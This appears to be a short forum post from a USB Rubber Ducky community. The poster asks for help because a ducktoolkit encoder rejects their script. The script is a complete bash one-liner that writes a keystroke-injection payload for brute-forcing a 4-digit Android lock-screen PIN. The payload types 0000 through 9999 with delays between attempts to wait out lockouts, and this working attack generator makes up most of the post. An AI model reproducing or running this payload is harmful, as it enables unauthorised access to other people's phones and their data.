[Payload] Android Brute Force 4-digit pin in Classic USB Rubber Ducky Posted January 30, 2018 When I put the original script into the ducktoolkit encoder it doesn't encode it into an inject.bin but instead it says "command echo not found in language file." Can someone please helpĀ echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt [/CODE] The original script^
[Payload] Android Brute Force 4-digit pin
in Classic USB Rubber Ducky
Posted
When I put the original script into the ducktoolkit encoder it doesn't encode it into an inject.bin but instead it says "command echo not found in language file." Can someone please helpĀ
The original script^